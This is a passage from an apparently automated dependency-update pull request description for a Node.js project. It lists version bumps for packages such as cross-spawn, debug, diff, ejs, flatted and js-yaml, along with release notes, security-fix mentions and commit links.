href=\"https://github.com/moxystudio/node-cross-spawn/commit/6717de49ff1e5de49622488dcb9c33fb25370c85\"\u003e\u003ccode\u003e6717de4\u003c/code\u003e\u003c/a\u003e chore: upgrade standard-version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003e\u003ccode\u003ef700743\u003c/code\u003e\u003c/a\u003e fix: update cross-spawn version to 7.0.5 in package-lock.json\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9a7e3b2165917367f74b8365faad9873b30d7263\"\u003e\u003ccode\u003e9a7e3b2\u003c/code\u003e\u003c/a\u003e chore: fix build status badge\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/085268352dcbcad8064c64c5efb25268b4023184\"\u003e\u003ccode\u003e0852683\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e\u003ccode\u003e640d391\u003c/code\u003e\u003c/a\u003e fix: fix escaping bug introduced by backtracking\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/bff0c87c8b627c4e6d04ec2449e733048bebb464\"\u003e\u003ccode\u003ebff0c87\u003c/code\u003e\u003c/a\u003e chore: remove codecov\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/a7c6abc6fee79641d45b452fe6217deaa1bd0973\"\u003e\u003ccode\u003ea7c6abc\u003c/code\u003e\u003c/a\u003e chore: replace travis with github workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9b9246e0969e86656d7ccd527716bc3c18842a19\"\u003e\u003ccode\u003e9b9246e\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e\u003ccode\u003e5ff3a07\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `debug` from 4.2.0 to 4.3.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/debug-js/debug/releases\"\u003edebug's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.3.1\u003c/h2\u003e\n\u003ch1\u003ePatch release 4.3.1\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixes a ReDOS regression (\u003ca href=\"https://redirect.github.com/debug-js/debug/issues/458\"\u003e#458\u003c/a\u003e) - see \u003ca href=\"https://redirect.github.com/debug-js/debug/issues/797\"\u003e#797\u003c/a\u003e for details.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.3.0\u003c/h2\u003e\n\u003ch1\u003eMinor release\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDeprecated \u003ccode\u003edebugInstance.destroy()\u003c/code\u003e\u003c/strong\u003e. Future major versions will not have this method; please remove it from your codebases as it currently does nothing.\u003c/li\u003e\n\u003cli\u003eFixed quoted percent sign\u003c/li\u003e\n\u003cli\u003eFixed memory leak within debug instances that are created dynamically\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/0d3d66b0eb47c5d34e1a940e8a204446fdd832cd\"\u003e\u003ccode\u003e0d3d66b\u003c/code\u003e\u003c/a\u003e 4.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/b6d12fdbc63b483e5c969da33ea6adc09946b5ac\"\u003e\u003ccode\u003eb6d12fd\u003c/code\u003e\u003c/a\u003e fix regression\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/3f56313c1e4a0d59c1054fb9b10026b6903bfba7\"\u003e\u003ccode\u003e3f56313\u003c/code\u003e\u003c/a\u003e 4.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/e2d3bc9e428bdd45adb8d6e7f8ab543bee54d9a6\"\u003e\u003ccode\u003ee2d3bc9\u003c/code\u003e\u003c/a\u003e add deprecation notice for debug.destroy()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/72e7f864bd75fc8353e4dd450de96d9104ba9f35\"\u003e\u003ccode\u003e72e7f86\u003c/code\u003e\u003c/a\u003e fix memory leak within debug instance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/27152cad248df54217a14c072e7be1cd16da5f6d\"\u003e\u003ccode\u003e27152ca\u003c/code\u003e\u003c/a\u003e add test for enable/disable of existing instances\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/22e13fe07e21f32888201aa40833599fd10a4fbb\"\u003e\u003ccode\u003e22e13fe\u003c/code\u003e\u003c/a\u003e fix quoted percent sign\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/debug-js/debug/compare/4.2.0...4.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~qix\"\u003eqix\u003c/a\u003e, a new releaser for debug since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `diff` from 4.0.2 to 5.0.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kpdecker/jsdiff/blob/master/release-notes.md\"\u003ediff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.2 - January 2026\u003c/h2\u003e\n\u003cp\u003eOnly change from 5.2.0 is a backport of the fix to \u003ca href=\"https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\"\u003ehttps://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003ev5.2.1 (deprecated)\u003c/h2\u003e\n\u003cp\u003eAccidental release - do not use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b7b6339dea15baa636bebe7092ec1cbabf001dea\"\u003e\u003ccode\u003eb7b6339\u003c/code\u003e\u003c/a\u003e v5.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b5377abefc55cd424e82308515cfbdc4d53ad8a1\"\u003e\u003ccode\u003eb5377ab\u003c/code\u003e\u003c/a\u003e Update package version to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/78017899c4c80d51db805b6e013079cadc6ed0ae\"\u003e\u003ccode\u003e7801789\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/649\"\u003ekpdecker/jsdiff#649\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/042a8372f331ffd3d81b1e4b799409c7d944e6fd\"\u003e\u003ccode\u003e042a837\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/647\"\u003ekpdecker/jsdiff#647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/kpdecker/jsdiff/compare/v5.2.0...v5.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ejs` from 3.1.6 to 5.0.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mde/ejs/releases\"\u003eejs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.0.2\u003c/h2\u003e\n\u003cp\u003eVersion 5.0.2\u003c/p\u003e\n\u003ch2\u003ev5.0.1\u003c/h2\u003e\n\u003cp\u003eVersion 5.0.1\u003c/p\u003e\n\u003ch2\u003ev4.0.1\u003c/h2\u003e\n\u003cp\u003eVersion 4.0.1\u003c/p\u003e\n\u003ch2\u003ev3.1.10\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.10\u003c/p\u003e\n\u003ch2\u003ev3.1.9\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.9\u003c/p\u003e\n\u003ch2\u003ev3.1.8\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.8\u003c/p\u003e\n\u003ch2\u003ev3.1.7\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.7\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mde/ejs/blob/main/RELEASE_NOTES_v5.md\"\u003eejs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eEJS Version 5.0.1 Release Notes\u003c/h1\u003e\n\u003ch2\u003eOverview\u003c/h2\u003e\n\u003cp\u003eEJS version 5.0.1 is a major release that removes deprecated options, fixes template\nbehavior with custom delimiters, improves the CLI and build pipeline, and simplifies\nthe package by moving Jake to a dev-only dependency.\u003c/p\u003e\n\u003ch2\u003eMajor Changes\u003c/h2\u003e\n\u003ch3\u003eDeprecated Option Removed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRemoved \u003ccode\u003eclient\u003c/code\u003e option\u003c/strong\u003e (Fixes \u003ca href=\"https://redirect.github.com/mde/ejs/issues/746\"\u003e#746\u003c/a\u003e): The legacy \u003ccode\u003eclient\u003c/code\u003e flag and related\ncode have been removed. This option produced browser-oriented template functions\nby inlining escape and rethrow helpers; it was unmaintained and broken. Use the\nstandard browser bundle (\u003ccode\u003eejs.min.js\u003c/code\u003e) or compile templates for the client using\nyour own build setup.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCustom delimiters and whitespace-slurp tags\u003c/strong\u003e (Fixed \u003ca href=\"https://redirect.github.com/mde/ejs/issues/780\"\u003e#780\u003c/a\u003e): Whitespace-slurp\ntags (\u003ccode\u003e\u0026lt;%_\u003c/code\u003e and \u003ccode\u003e_%\u0026gt;\u003c/code\u003e by default) now respect custom \u003ccode\u003eopenDelimiter\u003c/code\u003e, \u003ccode\u003edelimiter\u003c/code\u003e,\nand \u003ccode\u003ecloseDelimiter\u003c/code\u003e. Previously, the slurp regex was hardcoded to \u003ccode\u003e\u0026lt;%\u003c/code\u003e/\u003ccode\u003e%\u0026gt;\u003c/code\u003e,\nso custom delimiters did not work correctly with \u003ccode\u003e\u0026lt;%_\u003c/code\u003e/\u003ccode\u003e_%\u0026gt;\u003c/code\u003e-style tags.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCLI \u0026amp; Build\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCLI no longer depends on Jake\u003c/strong\u003e: The \u003ccode\u003eejs\u003c/code\u003e CLI now uses a bundled argument\nparser (\u003ccode\u003elib/esm/parseargs.js\u003c/code\u003e / \u003ccode\u003elib/cjs/parseargs.js\u003c/code\u003e) instead of the Jake\nprogram module. Jake remains a devDependency for the build (lint, compile,\nbrowserify, minify, test).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eJake moved to devDependencies\u003c/strong\u003e: Jake was moved from \u003ccode\u003edependencies\u003c/code\u003e to\n\u003ccode\u003edevDependencies\u003c/code\u003e, so installing \u003ccode\u003eejs\u003c/code\u003e as a dependency no longer pulls in Jake.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMinification fix\u003c/strong\u003e: The minify task now minifies the browserified \u003ccode\u003eejs.js\u003c/code\u003e\nbundle (output of the browserify task) instead of \u003ccode\u003elib/cjs/ejs.js\u003c/code\u003e, so the\nbrowser bundle is correctly minified.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation \u0026amp; Examples\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eJSDoc updates\u003c/strong\u003e: Removed references to the \u003ccode\u003eclient\u003c/code\u003e option and \u003ccode\u003eClientFunction\u003c/code\u003e\nfrom options and template-function documentation.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExamples\u003c/strong\u003e: \u003ccode\u003eexamples/client-compilation.html\u003c/code\u003e and \u003ccode\u003eexamples/express/app.js\u003c/code\u003e\nupdated to remove use of the \u003ccode\u003eclient\u003c/code\u003e option; Express example no longer passes\n\u003ccode\u003eclient: true\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eREADME\u003c/strong\u003e: Removed broken link to the third-party EJS playground.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCode Quality\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eTests\u003c/strong\u003e: Removed tests that targeted the removed \u003ccode\u003eclient\u003c/code\u003e option behavior.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUtils\u003c/strong\u003e: Removed unused \u003ccode\u003eclient\u003c/code\u003e-related code from \u003ccode\u003elib/esm/utils.js\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBreaking Changes\u003c/h2\u003e\n\u003ch3\u003eRemoved \u003ccode\u003eclient\u003c/code\u003e Option\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eOption removed\u003c/strong\u003e: The \u003ccode\u003eclient\u003c/code\u003e option is no longer supported. Passing\n\u003ccode\u003eclient: true\u003c/code\u003e (or any value) is ignored; no error is thrown, but no\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/a464c96302e57a53914604617331b69afccae25e\"\u003e\u003ccode\u003ea464c96\u003c/code\u003e\u003c/a\u003e Version 5.0.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/b4f7b4936452a6e28eafa7a1404fda16a818802d\"\u003e\u003ccode\u003eb4f7b49\u003c/code\u003e\u003c/a\u003e Hardening\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/2b155621f9b9ee0bcc59b6c877db69ab6f2fbc50\"\u003e\u003ccode\u003e2b15562\u003c/code\u003e\u003c/a\u003e Added release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/f9ab0b7d9437de643f1c63896271307708810a77\"\u003e\u003ccode\u003ef9ab0b7\u003c/code\u003e\u003c/a\u003e Version 5.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/173c46f4786f1d143cc51934b4696f0795079b2c\"\u003e\u003ccode\u003e173c46f\u003c/code\u003e\u003c/a\u003e Bump version for release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/35ad41b93e8b2ddd579e764d043057957d1a9866\"\u003e\u003ccode\u003e35ad41b\u003c/code\u003e\u003c/a\u003e Removed Jake\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/bf142d1abc5fdd76fc498db97f613806cd80fb47\"\u003e\u003ccode\u003ebf142d1\u003c/code\u003e\u003c/a\u003e Updated version number\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/3cd835cfdaf327e4549bf9139e8613244ac5a929\"\u003e\u003ccode\u003e3cd835c\u003c/code\u003e\u003c/a\u003e Remove broken playground link\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/6e1289c3344e8b3aeb4f7ecd8ae70c36be8664df\"\u003e\u003ccode\u003e6e1289c\u003c/code\u003e\u003c/a\u003e Fix minification\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/5090873fbff032d61968a32232346fafa65b06d2\"\u003e\u003ccode\u003e5090873\u003c/code\u003e\u003c/a\u003e Fixes \u003ca href=\"https://redirect.github.com/mde/ejs/issues/746\"\u003e#746\u003c/a\u003e, removed old 'client' flag\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mde/ejs/compare/v3.1.6...v5.0.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 2.0.2 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v2.0.2...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `http-cache-semantics` from 4.1.0 to 4.2.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/kornelski/http-cache-semantics/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.0 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) 